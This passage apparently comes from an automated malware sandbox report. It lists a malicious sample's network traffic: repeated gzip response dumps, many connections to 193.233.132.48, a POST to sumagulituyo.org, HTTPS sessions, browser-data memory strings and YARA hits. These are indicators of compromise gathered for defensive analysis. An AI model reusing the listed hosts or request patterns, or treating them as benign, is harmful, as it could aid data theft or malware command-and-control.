                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=3hbswjef1inqexnm0kk21byr; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=wrnejr1m01rpyw0yqs1kxqt0; path=/; HttpOnly; SameSite=LaxX-AspNetMvc-Version: 5.2X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Length: 6425Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.255.217
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.255.217
                      Source: AppLaunch.exe, 0000000B.00000002.2652568968.000000000946A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: B\https_www.youtube., equals www.youtube.com (Youtube)
                      Source: AppLaunch.exe, 0000000B.00000002.2651411438.00000000093F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb] equals www.youtube.com (Youtube)
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hanidnvetibgeinm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: sumagulituyo.org
                      Source: unknownHTTPS traffic detected: 45.66.33.45:443 -> 192.168.2.6:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.6:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.241.208.163:443 -> 192.168.2.6:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 51.81.56.229:443 -> 192.168.2.6:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51461 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51454 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51455 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 69.160.38.2:443 -> 192.168.2.6:51463 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.204.29:443 -> 192.168.2.6:51437 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.6:51439 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 69.160.38.2:443 -> 192.168.2.6:51543 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.71.33.31:443 -> 192.168.2.6:51709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.31.35.50:443 -> 192.168.2.6:51460 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.31.35.50:443 -> 192.168.2.6:51451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:51432 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51462 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.120.236.18:443 -> 192.168.2.6:51429 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51969 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 85.255.14.18:443 -> 192.168.2.6:51427 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 85.255.14.18:443 -> 192.168.2.6:52091 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.68.234.252:443 -> 192.168.2.6:51434 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.6:51456 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:52087 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.120.236.18:443 -> 192.168.2.6:51948 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.96.160.144:443 -> 192.168.2.6:51705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.96.160.144:443 -> 192.168.2.6:52093 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54952 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54953 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:54818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:55199 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:55331 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:55678 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.204.29:443 -> 192.168.2.6:56050 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57652 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49782 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 18.2.6942.exe.910e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.890e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.8a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.2300e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.fjdvfwi.2310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.6942.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.6942.exe.a70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.wjdvfwi.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.3012627913.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2483457593.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2141424740.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
